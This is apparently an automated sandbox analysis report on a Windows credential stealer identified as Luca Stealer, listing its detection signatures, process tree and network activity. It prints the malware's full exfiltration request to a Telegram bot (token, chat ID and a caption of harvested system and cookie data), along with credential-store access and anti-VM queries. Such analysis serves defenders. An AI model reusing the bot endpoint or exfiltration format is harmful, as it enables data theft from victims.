Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
765iYbgWn9.exe

Overview

General Information

Sample name:765iYbgWn9.exe
renamed because original name is a hash value
Original sample name:0534ab10184891cd61d262bfd79b7b4c.exe
Analysis ID:1483815
MD5:0534ab10184891cd61d262bfd79b7b4c
SHA1:a13d37959a92bc37f4d3c42eb53d77cc760f448a
SHA256:191272e200345dcb0a7a8c8c975a8b07847f07b9d9f0c3af472fdb88092aee0b
Tags:64exetrojan
Infos:

Detection

Luca Stealer
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Luca Stealer
AI detected suspicious sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • 765iYbgWn9.exe (PID: 1996 cmdline: "C:\Users\user\Desktop\765iYbgWn9.exe" MD5: 0534AB10184891CD61D262BFD79B7B4C)
    • powershell.exe (PID: 6768 cmdline: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
765iYbgWn9.exeJoeSecurity_LucaStealerYara detected Luca StealerJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_LucaStealerYara detected Luca StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: 765iYbgWn9.exe PID: 1996JoeSecurity_LucaStealerYara detected Luca StealerJoe Security
        Process Memory Space: 765iYbgWn9.exe PID: 1996JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.0.765iYbgWn9.exe.7ff6a5820000.0.unpackJoeSecurity_LucaStealerYara detected Luca StealerJoe Security

            Sigma Signatures

            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\765iYbgWn9.exe", ParentImage: C:\Users\user\Desktop\765iYbgWn9.exe, ParentProcessId: 1996, ParentProcessName: 765iYbgWn9.exe, ProcessCommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", ProcessId: 6768, ProcessName: powershell.exe

            Snort Signatures

            No Snort rule has matched

            Suricata Signatures

            Timestamp:2024-07-29T07:33:02.984024+0200
            SID:2022930
            Source Port:443
            Destination Port:49714
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-29T07:32:24.993610+0200
            SID:2022930
            Source Port:443
            Destination Port:49705
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-29T07:32:56.286114+0200
            SID:2039009
            Source Port:443
            Destination Port:49713
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: 765iYbgWn9.exeReversingLabs: Detection: 50%
            Source: 765iYbgWn9.exeVirustotal: Detection: 32%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49713 version: TLS 1.2
            Source: 765iYbgWn9.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: mp\Symbols\ntkrnlmp.pdbE source: 765iYbgWn9.exe, 00000000.00000003.2470462357.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: APPDATAlmp.pdb source: 765iYbgWn9.exe, 00000000.00000003.2472147301.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2472751371.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2471769592.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2470462357.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2473008318.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2472505961.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2471381267.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2470855696.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rust_stealer_xss.pdb source: 765iYbgWn9.exe
            Source: Binary string: lmp.pdb source: 765iYbgWn9.exe, 00000000.00000003.2472147301.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2472751371.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2471769592.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2470462357.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2473008318.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2472505961.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2471381267.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2470855696.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\VirtualStore\ntkrnlmp.pdb source: 765iYbgWn9.exe, 00000000.00000003.2465177046.0000019C7100E000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2466096832.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2466310468.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2469067738.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2469257983.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2464719662.0000019C7100E000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465796025.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2468790555.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2468349825.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: JDSOXXXWOA.docxnlmp.pdbE source: 765iYbgWn9.exe, 00000000.00000003.2472147301.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2472751371.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2471769592.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2473008318.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2472505961.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2471381267.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2470855696.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbE source: 765iYbgWn9.exe, 00000000.00000003.2465177046.0000019C7100E000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2466096832.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2466310468.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2469067738.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2469257983.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2464719662.0000019C7100E000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465796025.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2468790555.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2468349825.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: lmp.pdbE source: 765iYbgWn9.exe, 00000000.00000003.2510453634.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\Jump to behavior

            Networking

            barindex
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: POST /bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendDocument?chat_id=5795480469&caption=%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.33%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-04:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20EC6CD_O6G%20(1280,%201024)%0AHWID:%205229958482931895%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\765iYbgWn9.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Cookies:%20&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=a823006a12d4c370-61345550b38b208b-8e57514f4d7e4bc0-4d5848ed09e1c9e1content-length: 891245accept: */*host: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
            Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
            Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: ipwho.is
            Source: unknownDNS query: name: ipwho.is
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
            Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
            Source: global trafficDNS traffic detected: DNS query: ipwho.is
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendDocument?chat_id=5795480469&caption=%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.33%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-04:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20EC6CD_O6G%20(1280,%201024)%0AHWID:%205229958482931895%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\765iYbgWn9.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Cookies:%20&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=a823006a12d4c370-61345550b38b208b-8e57514f4d7e4bc0-4d5848ed09e1c9e1content-length: 891245accept: */*host: api.telegram.org
            Source: 765iYbgWn9.exeString found in binary or memory: http://ns.adobe.
            Source: 765iYbgWn9.exeString found in binary or memory: http://www.w3.or
            Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: 765iYbgWn9.exeString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-supportC:
            Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49713 version: TLS 1.2
            Source: 765iYbgWn9.exeBinary string: Afdfd\Device\Afd\Mio
            Source: 765iYbgWn9.exeBinary string: Failed to open \Device\Afd\Mio:
            Source: classification engineClassification label: mal72.troj.spyw.winEXE@4/15@3/2
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.dbJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_03
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile created: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Jump to behavior
            Source: 765iYbgWn9.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\765iYbgWn9.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Users\user\Desktop\765iYbgWn9.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 765iYbgWn9.exe, 00000000.00000000.2071534382.00007FF6A5C17000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: 765iYbgWn9.exe, 00000000.00000000.2071534382.00007FF6A5C17000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: 765iYbgWn9.exe, 00000000.00000000.2071534382.00007FF6A5C17000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: 765iYbgWn9.exe, 00000000.00000000.2071534382.00007FF6A5C17000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: 765iYbgWn9.exe, 00000000.00000000.2071534382.00007FF6A5C17000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
            Source: 765iYbgWn9.exe, 00000000.00000000.2071534382.00007FF6A5C17000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: 765iYbgWn9.exe, 00000000.00000003.2466694867.0000019C72E55000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465177046.0000019C7100E000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2464670639.0000019C7102C000.00000004.00000020.00020000.00000000.sdmp, Login Data.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 765iYbgWn9.exe, 00000000.00000000.2071534382.00007FF6A5C17000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
            Source: 765iYbgWn9.exeReversingLabs: Detection: 50%
            Source: 765iYbgWn9.exeVirustotal: Detection: 32%
            Source: unknownProcess created: C:\Users\user\Desktop\765iYbgWn9.exe "C:\Users\user\Desktop\765iYbgWn9.exe"
            Source: C:\Users\user\Desktop\765iYbgWn9.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\765iYbgWn9.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: cryptnet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
